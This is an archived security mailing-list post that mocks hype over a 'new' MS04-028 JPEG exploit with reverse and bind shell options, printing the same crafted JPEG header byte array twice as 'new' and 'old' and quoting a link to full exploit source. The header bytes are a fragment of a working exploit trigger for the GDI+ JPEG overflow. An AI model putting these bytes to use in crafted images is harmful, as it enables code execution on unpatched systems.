lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY10-DAV27o3DjFbUc000037ba@hotmail.com> From: se_cur_ity at hotmail.com (morning_wood) Subject: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector ------------------- / snip /----------------- new. char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- old. ------------------- / snip /----------------- char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- take your media hype and die kthnx, m.wood > the last step before the worm > > http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
Powered by blists - more mailing lists